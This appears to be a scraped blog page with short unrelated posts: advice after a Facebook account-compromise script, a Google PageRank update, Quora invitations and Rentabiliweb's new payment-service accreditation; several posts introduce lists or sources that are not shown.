If you think you have been compromised by the script, first of all clear your cookies and change your password. Facebook is setting up HTTPS access to its platform and is developing a system against suspicious account password recovery, "Social Authentication": when you log in again after a suspicious move on your account, Facebook asks you to prove your identity by picking friends out of randomly chosen pictures of them. If you don't make too many errors, you are allowed to log on.
More info/screenshots soon...
28/01/11: got some news.
Got the sources Roy Castillo used:
Little SEO news: Google is updating PageRank on all their DCs (data centers). The PR of most of my own sites has changed. Can we say this precious indicator is back?
"Precious", you said? Many people say they don't care about PR. But the difference between a PR1 page and a PR5 page is HUGE! Nobody cares, but everybody wants one :)
For the moment, check: http://www.seocentro.com/tools/search-engines/pagerank-dc.html (an old but working tool).
Here is a list of working Google DCs. Let us know about your PR update in the comments: were your sites granted one?
The more testimonies we have, the better we'll be able to discuss it.
Rules have changed if you still want a Quora invitation:
Rentabiliweb is now allowed to offer transfer execution, standing orders and payment orders by credit card.
In the near future, it plans to extend its services to direct debits.
Remember that Rentabiliweb is one of the biggest platforms for website monetization.
Rentabiliweb is also launching a drive to extend this accreditation in order to join the SWIFT network and handle debit and bank transfer operations without intermediaries.
The firm announced the filing of several applications for European "passporting" of these services, which means it may soon extend them to its future e-commerce customers in other European countries: countries such as the United Kingdom and Belgium, but also countries where e-commerce is still developing, such as Spain and Italy.
So we should expect many changes in their upcoming e-commerce offers!
Let's wait...